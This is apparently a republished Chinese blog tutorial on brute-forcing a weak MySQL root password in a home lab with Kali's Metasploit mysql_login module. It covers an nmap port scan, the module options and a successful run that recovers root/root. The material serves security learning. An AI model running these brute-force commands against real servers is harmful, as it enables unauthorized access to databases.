一、實(shí)驗(yàn)環(huán)境
1.攻擊方:
攻擊環(huán)境使用KALI系統(tǒng)(使用虛擬機(jī)搭建)的Metasploit模塊,msfconsole是metasploit中的一個(gè)工具,它集成了很多漏洞的利用的腳本,并且使用起來很簡單的網(wǎng)絡(luò)安全工具。
這里要特別強(qiáng)調(diào):被攻擊的環(huán)境必須開啟mysql遠(yuǎn)程登陸服務(wù),通常MySQL開啟的端口號(hào)是3306,故而一般情況下要求被攻擊的服務(wù)器開啟了3306端口號(hào)。
2.被攻擊MySQL環(huán)境:
Windows的PHPStudy環(huán)境搭建的MySQL服務(wù)
這里特別要注意MySQL需要啟動(dòng)允許遠(yuǎn)程訪問,因?yàn)闈B透環(huán)境是Kali虛擬機(jī)訪問windows系統(tǒng)安裝的MySQL環(huán)境,滲透成功的前提是MySQL允許遠(yuǎn)程訪問,因?yàn)槟J(rèn)情況下小皮工具搭建的MySQL服務(wù)是僅允許本地訪問的。
修改PHPStudy配套的MySQL服務(wù)允許遠(yuǎn)程訪問的開啟方法可以我之前的文檔Nmap爆破MySQL弱口令漏洞:解決報(bào)錯(cuò)Accounts: No valid accounts found_mooyuan的博客-CSDN博客
搭建好環(huán)境后,可以使用nmap探測MySQL環(huán)境,命令為
nmap 192.168.71.1
滲透結(jié)果如下,確認(rèn)3306端口MySQL服務(wù)已開啟
?文章來源地址http://www.zghlxwxcb.cn/news/detail-409818.html
二、MSF滲透過程
Metasploit進(jìn)行SQL數(shù)據(jù)庫弱口令暴力破解
1、在終端輸入msfconsole命令即可進(jìn)入msf的控制臺(tái)
msfconsole
進(jìn)入2后效果如下
?2.使用mysql_login暴力破解模塊進(jìn)行滲透
?使用MySQL暴力破解腳本mysql_login進(jìn)行滲透
use auxiliary/scanner/mysql/mysql_login
使用show options命令顯示暴力破解的參數(shù)
show options
如下所示為各個(gè)參數(shù)的含義
這里要特別強(qiáng)調(diào)幾個(gè)需要配置的參數(shù),
(1)RHOSTS是遠(yuǎn)程MySQL服務(wù)器的ip地址
(2)RPORT 3306 是MySQL開啟的端口號(hào),默認(rèn)是3306;如果不是3306端口的時(shí)候需要配置
(3)USERNAME是MySQL的用戶名,默認(rèn)為root;這里當(dāng)?shù)卿浻脩舭l(fā)生變換不是root時(shí), 需要配置
(4)PASS_FILE這里是指定爆破的密碼字典文件的路徑。
舉個(gè)例子,出于方便我僅僅將pass.txt設(shè)置為包含root和111111這兩個(gè)密碼(這里的前提是windows主機(jī)安裝MySQL,默認(rèn)密碼root沒有改過,所以只要將密碼文件pass.txt中增加了MySQL服務(wù)器中真實(shí)的密碼即可)
如果密碼路徑為/home/kali/pass.txt 那么可以進(jìn)行滲透配置
set pass_file /home/kali/pass.txt
?3.暴力破解
在滲透前配置暴力破解參數(shù),其中MySQL服務(wù)器為192.168.71.1,端口號(hào)為3306,用戶名為root,密碼文件為/home/kali/pass.txt,最后使用run命令進(jìn)行滲透,具體命令如下所示
set rhosts 192.168.71.1 //設(shè)置目標(biāo)服務(wù)器的ip地址
set rport 3306 //設(shè)置目標(biāo)端口,為MySQL開啟的端口號(hào),默認(rèn)是3306
set username root //設(shè)置用戶名,默認(rèn)即為root
set pass_file /home/kali/pass.txt //指定密碼字典文件的路徑
run //開始爆破
?如下所示,由于默認(rèn)用戶名是root,且端口號(hào)3306均為root,故而這兩項(xiàng)其實(shí)在沒有變化時(shí)可以不指定,滲透過程如下所示
如上所示,滲透成功:獲取到用戶名root,密碼為root。文章來源:http://www.zghlxwxcb.cn/news/detail-409818.html
?
到了這里,關(guān)于Kali系統(tǒng)MSF模塊暴力破解MySQL弱口令漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!